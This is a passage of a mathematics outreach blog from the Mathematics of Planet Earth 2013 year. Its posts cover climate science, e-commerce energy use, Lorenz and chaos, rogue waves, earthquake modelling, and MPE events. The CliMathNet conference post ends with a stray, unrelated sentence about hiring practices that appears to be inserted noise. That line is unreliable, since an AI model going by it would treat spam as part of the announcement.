    Interestingly, the third plenary talk at the symposium was given by Lauren Williams and it also had a tie to MPE2013. The title of the talk was “Grassmannians and Shallow Water Waves”. The talk described some interesting connections with the geometry of water waves and combinatorics. When I walked into the recital hall to attend this lecture, I thought the picture on the screen looked familiar. It turns out it was one of those that appears in our blog of February 28 in the article about the work of Mark Ablowitz and Douglas Baldwin.

    So the MPE2013 movement is spreading out in many ways.

    Estelle Basor

    Posted in Climate, Conference Report | Leave a comment

    Retail vs. E-tail

    As more and more purchasing takes place online, I’ve been wondering whether it’s more energy efficient to go out and buy something at a local store or to order it over the internet and have it delivered to my door. And which one has the smaller carbon footprint? Now it’s pretty simple to figure out my cost in time and money, and so like millions of other people I often decide that for me online is cheaper. But I see the cardboard boxes and the packing material filling up the recycle bins where we live, and I notice the delivery trucks every day making deliveries on our block, and I wonder about the differences in the total energy costs of the systems for getting goods from manufacturers to customers.

    Well, I have found some studies of exactly these questions, and the answer is: it all depends. But what it depends on is something easy to analyze and to a great extent something that I can control. That key factor is the trip from home to store—how far it is and how I get there.

    This conclusion comes from a study of the logistics of delivering flash drives from the manufacturer to the customers’ homes by traditional retail and by online retail. Not included in the study were the energy used and CO2 emitted for the pieces of the supply chain that both had in common such as the manufacturing process, and so it is not a total accounting of energy consumed and carbon footprint. And although the study focuses on a narrow product line, the data used came directly from an online seller and a wholesale supplier. (The research appears in Life Cycle Comparison of Traditonal Retail and E-commerce Logistics for Electronic Products: A Case Study of buy.com. The authors are C. Weber, C. Hendrickson, P. Jaramillo, S. Matthews, A. Nagengast, and R. Nealer from the Green Design Institute, Carnegie Mellon University.)

    Not surprisingly, the packaging costs are significant for e-commerce and hardly important for traditional retail, and the computer network costs are much higher for e-commerce, but what surprised me is just how big a factor the “customer transport” parameter is for traditional retail, accounting for about 65% of the energy consumed and the CO2 emitted. The corresponding parameter for e-commerce is the “last mile delivery,” and although it is even bigger than packaging, it only comes to about a third as much, on average, as customer transport. Here is a chart from the study showing the makeup of the carbon footprints.

    CO2 emissions associated with retail and e-commerce delivery systems by stage

    Using probability models derived from the data for the parameter values, the authors ran Monte Carlo simulations to draw conclusions. They estimate that only 20% of the time does going to the store to make your purchase result in less CO2 emitted than having it delivered.

    Now what can I do about all this? Well, there is great variability in the two most important parameters: distance to the retail store and and the fuel economy of the customer’s car. There is so much variability, in fact, that if I walk to the store, it is almost surely uses less energy and emits less carbon dioxide than ordering online. If I drive just a couple of miles in a car that gets average mileage it is still likely to be less energy intensive. And if it is just a couple of miles, then I might ride my bike instead.

    Kent E. Morrison
    American Institute of Mathematics

    Posted in Economics, Energy, Transportation | 1 Comment

    How Good is the Milankovitch Theory?

    [Adapted from Chapter 11 of the forthcoming text Mathematics and Climate, by Hans G. Kaper and Hans Engler, to be published by the Society for Industrial and Applied Mathematics (SIAM), 2013.]

    In 1941, the Serbian mathematician Milutin Milankovitch (1879–1958) suggested that past glacial cycles might be correlated to cyclical changes in the insolation (the amount of solar energy that reaches Earth from the Sun) [M. Milankovitch, Kanon der Erdbestrahlung und seine Anwendung auf das Eiszeitenproblem, University of Belgrade, 1941]. This theory is known as the Milankovitch theory of glacial cycles and is an integral part of paleoclimatology (the study of prehistoric climates). It has been discussed in an earlier post on paleoclimate models by Christiane Rousseau.

    The theoretical results obtained for the Milankovitch cycles can be tested against temperature data from the paleoclimate record. In the 1970s, Hayes et al. [Variations in the Earth’s orbit: Pacemaker of the ice ages, Science, 194 (1976), 1121–1132] used data from ocean sediment core samples to relate the Milankovitch cycles to the climate of the last 468,000 years. One of their conclusions was that “. . . climatic variance of these records is concentrated in three discrete spectral peaks at periods of 23,000, 42,000, and approximately 100,000 years.” This study was repeated recently by Zachos et al. [Trends, rhythms, and aberrations in global climate 65 Ma to present, Science, 292 (2001), 686–693], who used much more extensive data. The reconstructed temperature profile and the corresponding power spectrum show periods of 100, 41, and 23 Kyr, see Figure 1.

    Climate Record 4.5 Myr

    Figure 1: Time series and power spectrum of the Earth’s climate record for the past 4.5 Myr.

    The best data we have for temperatures during the ice age cycles come from the analysis of isotope ratios of air trapped in pockets in the polar ice. The ratio of oxygen isotopes is a good proxy for global mean temperature. In the 1990s, Petit et al. [Climate and atmospheric history of the past 420,000 years from the Vostok ice core, Antarctica, Nature, 399 (1999), 429–436] studied data from the Vostok ice core to reconstruct a temperature profile for the past 420,000 years. Although the record is only half a million years long, it allows for fairly precise dating from the progressive layering process that laid down the ice. A spectral analysis shows cycles with periods of 100, 43, 24, and 19 Kyr, in reasonable agreement with previous findings and with the calculated periods of the Milankovitch cycles.

    At this point we might conclude that Milankovitch’s idea was correct and that ice ages are indeed correlated with orbital variations. There are, however, some serious caveats. Changes in the oxygen isotope ratio reflect the combined effect of changes in global ice volume and temperature at the time of deposition of the material, and the two effects cannot be separated easily. Furthermore, the cycles do not change the total energy received by the Earth if this is averaged over the course of a year. An increase in eccentricity, or obliquity, means the insolation is larger during part of the year and smaller during the rest of the year, with very little net effect on the total energy received at any latitude over a year. However, a change in eccentricity or obliquity could make the seasonal cycle more severe and thus change the extent of the ice caps. A possible scenario for the onset of ice ages would then be that minima in high-latitude insolation during the summer enable winter snowfall to persist throughout the year and thus accumulate to build glacial ice sheets. Similarly, times with especially intense high-latitude summer insolation could trigger a deglaciation. Clearly, additional detailed modeling would be needed to account for these effects.

    Even allowing for the scenario described in the previous paragraph, we would expect an asymmetric climate change, where the ice cap over one of the poles increases while the cap over the other decreases. Yet, the entire globe cooled during the ice ages and warmed during periods of deglaciation.

    An even more disturbing observation arises when one considers not just the periods of the cycles but also their relative strengths. In the data, the relative contributions are ordered as obliquity, followed by eccentricity, followed by precession, while for the average daily insolation at 65 degrees North latitude at the summer solstice (denoted Q65, shown in Figure 2), the order is the reverse: precession, followed by obliquity, followed by eccentricity. The dominance of precession in the forcing term Q65 does not even show up in the data (the “100,000-year problem”).

    Average daily insolation at 65 degrees North latitude at the summer solstice

    Figure 2: Time series and power spectrum of the average daily insolation at 65 degrees North at summer solstice (Q65).

    The lesson learned here is that actual climate dynamics are very complex, involving much more than insolation and certainly much more than insolation distilled down to a single quantity, Q65. Feedback mechanisms are at work that are hard to model or explain. On the other hand, an analysis of the existing signals shows that astronomical factors most likely play a role in the Earth’s long-term climate.

    Posted in Paleoclimate | Leave a comment

    Physics of Climate

    The American Physical Society (APS) now has a Topical Group on the Physics of Climate (GPC). The first Newsletter was published on March 13. This and future GPC newsletters are to be found on the GPC website. For information, contact gpc@aps.org.

    Posted in Climate, General | Leave a comment

    Teaching to the Planet

    For the past nine weeks, I had the privilege to teach a Massive Open Online Course (MOOC) on image and video processing. The first half of the class was dedicated to topics that everybody should know in the subject, like JPEG, JPEG-LS, the Hough Transform, histogram equalization, Otsu’s algorithm (like I always say to my students, if you didn’t learn that at school in your image processing class, you should ask for your money back!), and the second half was dedicated to advanced topics like partial differential equations and sparse modeling.

    The experience of teaching a MOOC, while extremely time consuming, is incredibly rewarding, and this has been the subject of many articles in the popular press already and is the topic of multiple in campus forums. What I want to express here instead is that such experience gave me the chance once again to realize and to teach how important mathematics is in image and video processing. Basically, all fundamental algorithms have an extraordinary mathematical support. JPEG for example, which is without any doubt the most successful image processing algorithm, is based on critical tools from Fourier analysis and information theory. Its most recent continuations, JPEG-2000 and JPEG-LS (both closely connected to the algorithms roaming Mars in both the previous and the current expeditions) are based again on fundamental mathematical concepts like wavelets, Golomb coding, and context modeling.

    The use of partial differential equations and differential geometry brought not only some top mathematicians to work in image processing, but numerous state-of-the-art results as well. More recently, compressed sensing and sparse modeling provided yet another example of how important mathematics is in this area. A propos this, in collaboration with the National Geospatial-Intelligence Agency, we have recently demonstrated the use of sparse modeling and dictionary learning for hyperspectral image classification, including from severely undersampled data. These types of techniques are critical to learn the state of our planet.

    Mathematics will continue to play a critical role in image and video processing; it has done it already for planet Earth and beyond.

    MOOC

    A collage of image processing, logo of the MOOC class.

    ApHill

    Original ApHill hyperspectral image, followed by mapping (classification) after reconstruction from only 2% of the data, without including spatial coherence in the process, and the same with spatial coherence.

    Guillermo Sapiro
    Edmund T. Pratt, Jr. Professor
    Dept of Electrical and Computer Engineering
    Duke University

    Posted in Imaging, Mathematics | Leave a comment

    CliMathNet Conference in Exeter, UK

    The first CliMathNet conference will be held on 1st-5th July 2013 in Exeter, UK. The conference will include opportunities to find out about outstanding problems in the mathematics of climate sciences and the relation to problems that policymakers have to face. Wednesday afternoon will include a poster session at the Met Office, while Thursday will have a policy theme. Topics include quantifying uncertainty of climate models, comprehensive climate risk analysis, forecasting climate tipping points, improving projections of extreme events and engaging with policy.

    Call for Abstracts and Registration

    Participants are invited to submit abstracts for talks or posters on related subjects by 19th April 2013. These may be on mathematical or statistical topics that could be of relevance to climate sciences (eg applied analysis, environmental statistics, stochastic differential equations, numerical methods), as well as on applications to climate and weather.

    CliMathNet is a network funded by EPSRC that aims to break down barriers between researchers in Mathematics, Statistics and Climate Sciences. For more details, and to register, see http://www.climathnet.org/conference2013/

    We think that mutual-consent hiring practices are one of the term most important things districts can do, ms

    Posted in Climate, Conference Announcement | Leave a comment

    Chaos in an Atmosphere Hanging on a Wall

    This month marks the 50th anniversary of the 1963 publication of Ed Lorenz’s groundbreaking paper, “Deterministic Nonperiodic Flow,” in the Journal of Atmospheric Science. This seminal work, now cited more than 11,000 times, inspired a generation of mathematicians and physicists to bravely relax their linear assumptions about reality, and embrace the nonlinearity governing our complex world. Quoting from the abstract of his paper: “A simple system representing cellular convection is solved numerically. All of the solutions are found to be unstable, and almost all of them are nonperiodic.”

    While many scientists had observed and characterized nonlinear behavior before, Lorenz was the first to simulate this remarkable phenomenon in a simple set of differential equations using a computer. He went on to demonstrate the limit of predictability of the atmosphere to be roughly two weeks, the time it takes for two virtually indistinguishable weather patterns to become completely different. No matter how accurate our satellite measurements get, no matter how fast our computers become, we will never be able to predict the likelihood of a rainy day beyond 14 days. This phenomenon became known as the butterfly effect, popularized in James Gleick’s book “Chaos.

    Inspired by the work of Lorenz and colleagues, in my lab at the University of Vermont we’re using Computational Fluid Dynamics (CFD) simulations to understand the flow behaviors observed in a physical experiment. It’s a testbed for developing mathematical techniques to improve the predictions made by weather and climate models.

    Lorenz Attractor

    A sketch of the Lorenz attractor from the original paper (left), a simulation of the convection loop analogous to Lorenz’s system [Harris et al. Tellus 2012].

    Here you’ll find a brief video describing the experiment analogous to the model developed by Lorenz:

    And below you’ll find a CFD simulation of the dynamics observed in the experiment.

    What is most remarkable about Lorenz’s 1963 model is its relevance to the state of the art in weather prediction today, despite the enormous advances that have been made in theoretical, observational, and computational studies of the Earth’s atmosphere. Every PhD student working in the field of weather prediction cuts their teeth testing data assimilation schemes on simple models proposed by Lorenz, his influence is incalculable.

    In 2005, while I was a PhD student in Applied Mathematics at the University of Maryland, the legendary Lorenz visited my advisor Eugenia Kalnay in her office in the Department of Atmospheric & Oceanic Science. At some point during his stay, he penned the following on a piece of paper: “Chaos: When the present determines the future, but the approximate present does not approximately determine the future.”

    Even near the end of his career, Lorenz was still searching for the essence of nonlinearity, seeking to describe this incredibly complicated phenomenon in the simplest of terms.

    Christopher M. Danforth, Ph.D.
    Associate Professor
    Computational Story Lab
    Department of Mathematics & Statistics
    University of Vermont

    Posted in Climate, Mathematics, Meteorology | 1 Comment

    Predecessors of MPE2013

    Psychologists analyzing the evolution of human societies might discuss and argue the following fact: It took approximately 40 years for the community of mathematicians to become aware of the various difficulties facing human society in the near future and to accept to work on these questions.

    The time is ripe to tackle these problems. Several mathematical tools have been developed recently that can be applied successfully to predict environmental developments. In “ancient times,” rather simple differential equations could be used to make predictions, for example about the evolution of our physical resources. Progress in the theory of dynamical systems, analysis, and the theory of partial differential equations, and the availability of ever-increasing amounts of physical data enable us to work on problems arising from the transformation of our society.

    At this point it is fair to pay homage to the modern Cassandra’s whose sensitivity and open-mindedness for the physical and human aspects of our society led them to draw the attention of their contemporaries to the ecological questions, the term ecological being taken in a wide sense. Physicists and mathematicians were the most popular of these Cassandra’s. Among them, a special tribute has to be given to two well known mathematicians, Alexandre Grothendieck and Pierre Samuel.

    A partial history of their intellectual adventures, of their acts has been related in a memoir by Céline PESSIS, “Les années 1968 et la science Survivre … et Vivre, des mathématiciens critiques à l’origine de l’écologisme.” The book can be downloaded here. As the title suggests, the memoir is written in French. Since it is a rather basic French, I‘ll only give a very few quotations, expecting that everyone can guess their meaning.

    The first quotation is from Grothendieck, the founder of Survivre:

    “Survivre et Vivre” (qui s’appelait d’abord “Survivre” sans plus) est le nom d’un groupe, à vocation d’abord pacifiste, ensuite également écologique, qui a pris naissance en juillet 1970 (en marge d’une “Summer School” à l’Université de Montréal), dans un milieu de scientifiques (et surtout, de mathématiciens).” Has the Canadian group of which Grothendieck is speaking created a kind of tradition at the University of Montreal, which might explain the presence and role of Christiane Rousseau in the birth and development of “Mathematics of Planet Earth”?

    According to Céline Plessis,
    “Survivre nous a paru jouer un rôle majeur dans l’émergence du mouvement d’écologie politique8, comme semblaient l’indiquer les noms des personnalités qui s’y trouvaient réunies et notamment la présence de Pierre Samuel qui fut un acteur clé du mouvement antinucléaire et un des “piliers” des Amis de la Terre durant plusieurs décennies. …. (La section française des Friends of the Earth (Amis de la Terre) est créée la même semaine de juillet 1970 que Survivre).”

    She observed that “Grothendieck et Samuel sont les membres de Survivre initialement les plus enclins à valoriser les scientifiques lanceurs d’alertes écologiques. Ils se portent caution, en 1972, pour la première publication des Amis de la Terre. Il s’agit d’une traduction de The Population Bomb, le livre du biologiste P. Ehrlich qui s’est vendu à 2 millions d’exemplaires aux Etats-Unis.”

    From the ecological and environmental point of view, Samuel had a prominent role. Céline Plessis sums up his personality and his action in these terms:

    “D’une extrême gentillesse et d’une grande douceur, plus âgé et ayant vécu la guerre, P. Samuel est une figure de stabilité dans Survivre, qui contraste avec la virulence d’autres membres de Survivre. Il assure avec attention la fonction de trésorier, ouvre sa porte à des permanences du groupe et est un des auteurs les plus prolixes du petit groupe. Grothendieck et lui imposent à Survivre leur conception utopique d’une société écologique à échelle humaine équipée de technologies douces, pacifiée et équilibrée, avant qu’une plus jeune génération ne radicalise le propos de la revue. D’une grande ouverture, il participera à ces nombreux combats d’une extrême radicalité sans se départir de sa non-violence et de son calme. Imprégné de la philosophie grecque et adepte du stoïcisme, son plaidoyer sera toujours tourné vers la `détente’ et la `modération’.”

    Grothendieck, who is still alive, has given his agreement to “Mathematics of Planet Earth.” No doubt, Pierre Samuel would have been happy to praise Christiane Rousseau and all the people at the origin of this highly significant initiative.

    Claude Paul Bruter

    Posted in General | Leave a comment

    The Great Wave Explained by Directional Focusing

    One of the most famous images in Japanese art is the Great Wave off Kanagawa, a woodblock print by the Japanese artist Hokusai. The print shows an enormous wave on the point of breaking over boats that are being sculled against the wave’s travel (see Figure 1a). As well as its fame in art, this print is also famous in mathematics: firstly because the structure of the breaking wave at its crest illustrates features of self-similarity, and secondly because the large amplitude of the wave has led it to be interpreted as a rogue wave generated from nonlinear wave effects (see J. H. E. Cartwright, H. Nakamura (2009) Notes Rec. R. Soc. 63, 119–135).

    However, we have just published a paper in Notes and Records of the Royal Society (J. M. Dudley, V. Sarano, F. Dias (2013) Notes Rec. R. Soc. 67 doi: 10.1098/rsnr.2012.0066) that points out that whether the generating mechanism is linear or nonlinear does not enter into the definition of a rogue wave; the only criterion is whether the wave is statistically much larger than the other waves in the immediate environment. In fact, by making reference to the Great Wave’s simultaneous transverse and longitudinal localisation, we show that the purely linear mechanism of directional focussing predicts characteristics consistent with those of the Great Wave. We have also been fortunate enough to collaborate with the photographer V. Sarano who has provided us with a truly remarkable photograph of a 6 m rogue wave observed on the Southern Ocean from the French icebreaker Astrolabe, which bears a quite spectacular resemblance to the Hokusai print (see Figure 1b).

    Great Wave

    Figure 1: Two views of a Great Wave: (a) from Hokusai ; (b) from Nature

    Rogue waves can arise from a variety of different mechanisms. For example, linear effects that can generate rogue waves include: spatial focusing due to refraction with varying topography; wave-current interactions; directional focusing of multiple wave trains. Nonlinear effects that have received much attention include the exponential amplification of random surface noise through modulation instability.

    In the case of the Great Wave, a clue to how linear effects may play a role is seen by noting the Great Wave’s localization both along its direction of travel and transversally – we see the wave rising from the foreground and ending in the middle ground of the print. This is in fact a characteristic seen in the linear effect of directional focusing, which arises whereby wave trains with different directions and phases interfere together at a particular point. Typical results of numerical modeling of this process are shown in Figure 2. The modeling is based on propagation equations that include both linear and nonlinear effects, but the concentration of energy at the focus arises from linear convergence. Nonlinearity plays a role only as the wave approaches the linear focus where it increases the steepness to the point of breaking.

    Wave Trains

    Figure 2 Numerical results showing Directional Focusing of periodic wave trains towards an extreme wave at the focus.

    The visual similarity of the numerical modeling of directional focusing with the localization properties seen in the woodcut is immediately apparent, and thus directional focusing is clearly also a mechanism that could underlie the formation of the Great Wave. In terms of the artwork of the woodcut itself, highlighting the physics of the transverse localization of the Great Wave provides room for unexpected optimism when interpreting the scene that is depicted as the sailors may not be in as much danger as usually believed. Is Hokusai really trying to highlight the skillful Japanese crews navigating around the wave to avoid it breaking over them?

    By John M. Dudley, Institut FEMTO-ST, UMR 6174 CNRS-Université de Franche-Comté, Besançon, France and Frédéric Dias, School of Mathematical Sciences, University College Dublin, Ireland.

    Posted in Geophysics, Ocean | Leave a comment

    MPE2013 Launched in Portugal, March 5, 2013, at “Pavilhão do Conhecimento” in Lisbon

    Contributed by José Francisco Rodrigues

    In Portugal, the “Matemática do Planeta Terra” (MPT2013) initiative is coordinated by a National Committee put together by the Portuguese Commission for UNESCO, with delegates from the Portuguese Mathematical Society (SPM), Association of Mathematical Teachers (APM), LUDUS Association, Centro Internacional de Matemática (CIM), Science Museum of the University of Coimbra, National Museum of Natural History and Science of the University of Lisbon and the National Agency for the Scientific and Technologic Culture (Ciência Viva).

    While the European launch of MPE2013 was taking place at the UNESCO Headquarters in Paris, a youth festival was taking place in Lisbon at “Pavilhão do Conhecimento,” the largest science center in Portugal, with hundred of pupils participating in mathematics popularization activities directly or indirectly related to the mathematics of planet earth for schools. Many activities around themes like “Pedro Nunes and the Quadrant”, “Construction of Sundials”, “Romanesque broccoli, cauliflowers and other iterations”, as well as a very popular “Mathematical Circus” fascinated and challenged the children and students during the day. A direct connection with the African isle of Principe allowed sharing several topics in popularization of mathematics for schools. The three Portuguese modules (the interactive modules “Rhumb Lines and Spirals” and “Earthquakes and Structures” and the “Sundials” film) participating in the international MPE2013 competition and selected for the UNESCO exhibition were also displayed in Lisbon. The official opening took place at the end of the day with a communication of the Portuguese Minister of Education and Science, Nuno Crato, a mathematician and former president of the Portuguese Mathematical Society who had participated at the UNESCO MPE session, and with the start of a “Portugal MPE2013 Tour.”

    Romanesque broccoli, cauliflowers and other iterations Romanesque broccoli, cauliflowers and other iterations
    Mathematical Circus Mathematical Circus

    The presentation in Portugal of the MPE2013 initiative took place on May 6, 2011, at the University of Lisbon, co-organized by CIM. CIM is currently organizing two scientific conferences and two summer schools, “International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change,” MECC 2013 in March, and “International Conference and Advanced School Planet Earth, Dynamics, Games and Science,” DGS 2013 in August-September 2013.

    Posted in General, Public Event | Leave a comment

    Modeling and Prediction of Earthquakes

    March 11 marks the second anniversary of the 2011 9.0 earthquake with epicenter located off the coast of Japan, which caught the world—including expert seismologists—by surprise. It was a stark reminder of how much is still unknown about faults and their sudden, catastrophic, behavior. Finding the precise geometry of faults and mapping existing strain fields in surrounding areas is still an open and very challenging problem. If we could overcome this challenge, we could run simulations of seismic activity and thus better assess risk in given areas.

    With my collaborator I. R. Ionescu (University of Paris), we have developed (Inverse Problems, 25, 1 (2009)) a robust method for locating and portraying faults that are active due to tangential dislocations. This was done under the assumption that only surface observations are available and that a traction-free condition applies at that surface.

    We also explored the possibility of detecting slow slip events (such as silent earthquakes, or earthquake nucleation phases) from GPS observations. Our study relied on an asymptotic estimate for the observed surface displacement. This estimate was first used to derive what we called the moments reconstruction method. Then it was used for finding necessary conditions for a surface displacement field to have been caused by a slip on a fault. These conditions led to the introduction of two parameters: the activation factor and the confidence index. They can be computed from the surface observations in a robust fashion. They indicate whether a measured displacement field is due to an active fault.

    We then inferred a combined reconstruction technique of fault profiles blending least-square minimization and the moments method. We carefully assessed how our reconstruction method is affected by the sensitivity of the observation apparatus and the stepsize for the grid of surface observation points. The maximum permissible stepsize for such a grid is computed for different values of fault depth and orientation. Finally we trained our numerical method for reconstructing faults on synthetic data.

    The mathematical analysis of the forward and inverse problem for this quasi-static fault slip problem is now complete. We are currently working on applying that theory to minute displacements data measured on a vast area around the central Pacific coast of Mexico. This is quite a challenging step of our project since we have to contend with noisy, error-tinted data, which also happens to be severely sparse due to the high cost of apparatus capable of resolving displacements of a few millimeters per month. A reliable reconstruction of an active fault around that subduction zone in Mexico can only be achieved through the combination of a sound mathematical model of stresses and displacements of the Earth’s crust, and given physical bounds on parameters to be recovered. These bounds are known to geophysicists thanks to two centuries of observations and field work.

    A network of GPS stations measuring minute displacements in a region of Central Mexico
    Reconstructed vertical displacements in mm (work in progress). The green circles correspond to the GPS stations.

    So could geophysicists some day be able to predict seismic events? Unfortunately, earthquake prediction may never be as reliable as, say, weather prediction. At best we will some day in the future be better at assessing the probability that a given region may suffer from an earthquake in the next 100 years. That said, knowing the precise geometry of faults together with a profile of stresses in a given area may be helpful in predicting the magnitude and the waveform of future seismic events.

    Darko Volkov
    Associate Professor
    Worcester Polytechnic Institute
    USA

    Posted in Geophysics | Leave a comment

    Lecture: Utilizing the environment to manage HIV/AIDS

    Edward M. Lungu, Department of Mathematics, University of Botswana

    About the Speaker:
    Edward Lungu is a professor of mathematics at the University of Botswana, in Gabarone, Botswana. He got his first degree in 1975 from the University of Zambia, and then went to the University of Bristol where he got a Master’s degree and a Ph.D. in 1980. Edward Lungu has been described as a “fundamental person” in the development of teaching and research in applied mathematics in Southern Africa. As founder and leader of the Southern Africa Mathematical Sciences Association (SAMSA) and later of AMMSI (the Millenium Initiative) he has simply done everything that one person could do: organized, encouraged, supervised, and led by his personal example in teaching and research. For Botswana itself, Edward Lungu has developed models in: hydrology (Botswana relies on storing rainfall), ecology (domestic livestock as well as wildlife are keys to the economy), and epidemiology (to understand the progression of HIV/AIDS and how to help the victims). The series of his recent papers in mathematical biosciences model the differential progression of HIV/AIDS based on characteristics of patients and the care they receive. In developing mathematical education and research, Edward Lungu has been described as a “giant force”: a force with organizational talent, tireless energy, and a friendly personality. In 2011 he was awarded the Su Buchin Prize of the International Council of Industrial and Applied Mathematics (ICIAM), which recognizes an outstanding contribution by an individual in the application of mathematics to emerging economies and human development, in particular at the economic and cultural level in developing countries.

    Abstract:
    Sub-Sahara Africa is the epicentre for both the HIV epidemic and poverty. In this presentation, we define poverty in terms of lack of clean water, energy and food. Sub-Sahara Africa can boast of abundant surface water, underground water, good soils, good climate and adequate rainfall in most parts of the region. How have these resources been utilized to improve the quality of life, especially for HIV infected people?
    Management of HIV/AIDS requires clean water, a highly nutritious diet and availability of energy for domestic use. In this region, water, food, energy and HIV/AIDS have formed a vicious cycle which is reducing the benefits that can be realized from HIV treatment drugs.
    Most countries in sub-Sahara Africa rely on wood to meet energy needs. Woodfuels constitute up to 80% of African primary energy needs and account for almost 90% to 98% of residential energy consumption in most rural sub-Sahara Africa. Due to deforestation, wood is being fetched from long distances from human settlements. Rural electrification has only reached a few villages close to national electricity grids. In homes where adults are living with HIV/AIDS, collecting the vital energy source, firewood, is a responsibility that has been passed on to the school going children. This task, although not intended to abuse the children, has led some rural children to abandon their education in order to look after their ailing parents/guardians, and some still in the school system may not have performed to their potential as a result.
    Most parts of sub-Sahara Africa have plenty of surface water from rivers, streams and ground water aquifers. However, underinvestment in water resources has meant that there is no piped water in most rural areas. This has adversely affected families with parents/guardians living with HIV/AIDS, as the children have taken on the responsibility of fetching water, a task that takes up a lot of their time as they have to walk long distances to the community borehole.
    Malnutrition and HIV/AIDS are closely linked disorders; both disorders can cause or contribute to severe immune suppression. In rural sub-Sahara Africa where agriculture is the main stay, HIV-related illnesses have incapacitated many adults who through illness have left their crop fields unattended, resulting in shortages of food and income for their families. Lack of income has affected the welfare of many children who have had to abandon their education.
    What must sub-Sahara Africa do to take advantage of the abundance of water, solar and arable land? Surface and underground water, if it is utilized properly, can transform the agricultural sector, which in turn will provide a balanced diet to the communities, especially the HIV infected individuals whose immune systems are already compromised. To pump water and supply clean water, a constant supply of energy is required. In sub-Sahara Africa, governments tend to think of big projects such as hydro or thermal electricity and yet energy can be generated from the abundant sunshine throughout the year. This can be done from roof tops to provide electricity for households who could then sell the surplus to the central electricity grid for use by institutions such as schools and hospitals.
    In this presentation, we suggest ways, in which communities can reduce deforestation, protect the fertile arable soils and in the process contribute to the well-being of citizens, especially people living with HIV/AIDS. Governments are already developing boreholes to extract underground water for rural communities. This presentation looks at how solar energy can be used to pump water to rural households and in turn help families with ailing parents/guardians to free their children from daily chores to concentrate on their education.
    We ask the questions “can the hydrology, hydrogeology, land and solar energy be the answer to better treatment of HIV/AIDS? Have the higher educational institutions argued the case for solar technology through research? What educational programs must be put in place in order to take full advantage of solar devices? What is the best strategy for protecting sub-Sahara African children?

    Posted in General, Public Event | Leave a comment

    A non-mathematician’s impressions of the Shuckburgh lecture

    On Monday, March 4, Emily Shuckburgh delivered the second of the MPE2013-Simons Public Lecture Series talk, “Climate disruption: what math and science have to say” at the Palace of Fine Arts in San Francisco. Nearly 800 people attended the lecture (tickets were sold out) with a nice mix of mathematicians and the general public.

    Here are the reflections of one of the attendees, Alison Hawkes, a freelance reporter based in San Francisco, and also the online editor of BayNature.

    “What I learned most from Emily Shuckburgh’s talk was her approach towards meshing field observations with mathematical models on climate change, and how the two combined can create a more robust set of predictions about the Earth’s future. So often you hear about the recent results from the field in some new study, but understanding more how that gets fed into the underlying math and physics of the world’s climate system is fascinating.

    She also presented some, quite frankly, frightening graphs of the Earth’s future under differing scenarios of greenhouse gas emissions. The graphs show, like nothing else, what a stark choice we have to make about living with the outcomes of our collective decision on what we do about climate change. And Shuckburgh’s portrayal of the timeline of these outcomes — a child born today will live in this future — really drove the point home that this isn’t just an academic debate, rather there is an enormous human dimension that we can measure in the lives of our children and grandchildren.”

    Posted in Climate, General, Public Event | Leave a comment

    SISC Special Issue

    In recognition of Mathematics of Planet Earth 2013, the SIAM Journal on Scientific Computing (SISC) has dedicated a special issue to Planet Earth and Big Data, bringing together two major scientific themes. SISC traditionally publishes papers on a wide variety of computational aspects of related research, including geosciences, atmospheric and oceanic fluid dynamics, methods for inverse problems, flow through porous media, detection and tracking of pollutants, computational astrophysics, and much more. This issue will highlight the role computational mathematics has in these important applications. Click here for details.

    Posted in General | Leave a comment

    Impressions from the First MPE Exhibition at UNESCO in Paris

    The mounting of the first MPE exhibition at the UNESCO Headquarters in Paris involved two teams, one around Michel Darche and Regis Goiffon from the Centre Sciences and the other around myself from Oberwolfach and IMAGINARY. While Michel and Regis developed ten physical exhibits from the collection of the Centre Science, we were in charge of the ten MPE competition modules selected for display, mainly interactive exhibits with computer programs and some pictures and films.

    We arrived in Paris on Saturday, March 2, to drop the equipment off at the main UNESCO building. The actual mounting of the exhibit started on Monday morning, March 4. A typical module consisted of a touch screen on a stand connected to a computer and a text board with explanation. Some modules were film stations or had several physical components, like a globe, extra images and some tools to measure angles and distances. We printed high-quality images of the Lorenz Attractor and the Quasicrystalline Wickerwork and displayed them in a small gallery. The films were put into a loop and shown on a touch screen, with two big sofas for viewing.

    For many stations, the authors had prepared further reading material or an activity book, which we placed next to the exhibit.

    On March 5, at 9:00 am, the first visitors started to explore the 20 modules of the exhibition. It was great that many authors of the competition modules came to Paris, not only the winners. The winners of the first, second and third prize were announced officially in the morning session of the MPE Day conference. Ehrhard Behrends, head of the jury, gave a brief overview of the modules and presented the authors with their award certificates. Daniel Ramos, author of the winning module “The Sphere of Earth” gave an introduction to his module.

    After the lunch break, the exhibition was opened to the public. Many of the approximately 250 visitors played with the exhibits and listened to the explanations by the authors of the modules. Here are some pictures of the opening and the exhibition.

    MPE Day at UNESCO, Paris

    As I am writing this blog, I am sitting in another UNESCO building, which is located just next to the main one and hosts all UNESCO embassy offices. We changed the site of the exhibition this morning and mounted everything here again, where it will stay until Friday, March 8, and attract a broader audience. We are just having a group of children here, ages 5-12, who all know “GPS” from the car of their parents and are guided by Regis through the physical GPS exhibit.

    If you are interested in seeing more details about the MPE exhibits, or if you want to download the images or programs – please, go to the Exhibition Web site. On the same Web site you can also contribute your own ideas and suggestions. We are planning to extend the exhibition and show it in many places around the world.

    All the best from Paris,
    Andreas

    Posted in MPE Exhibit, Public Event | 4 Comments

    News from the MPE2013 Competition

    Contributed by Ehrhard Behrends (Free University, Berlin, Germany)

    The competition for modules for a virtual exhibition started in January 2012. Here is the text of the announcement:

    “You are invited to prepare museum exhibits in different formats — images, films, programmes — or to design physical exhibits, and submit them for the competition. The best modules will be awarded and shown by our partner museums in 2013.”

    The winning entries would receive a monetary award:
    First prize: US\$ 5,000
    Second prize: US\$ 3,000
    Third prize: US\$ 2,000

    The announcement was complemented by a detailed description of the desired format of the submitted modules: author’s license, technical description etc.

    Twenty-nine entries were submitted for the competition. Most of them came from Europe, but there were also submissions from North America, India and the Philippines.

    The following aspects were considered as important when judging the submissions:

    * Is there an interesting mathematical content?
    * Has the module an MPE-relevance?
    * Is it engaging?
    * Is the contribution original?
    * Is the level appropriate to the public?
    * Could one present it without major modifications?
    * Is it easy to use for the visitors?

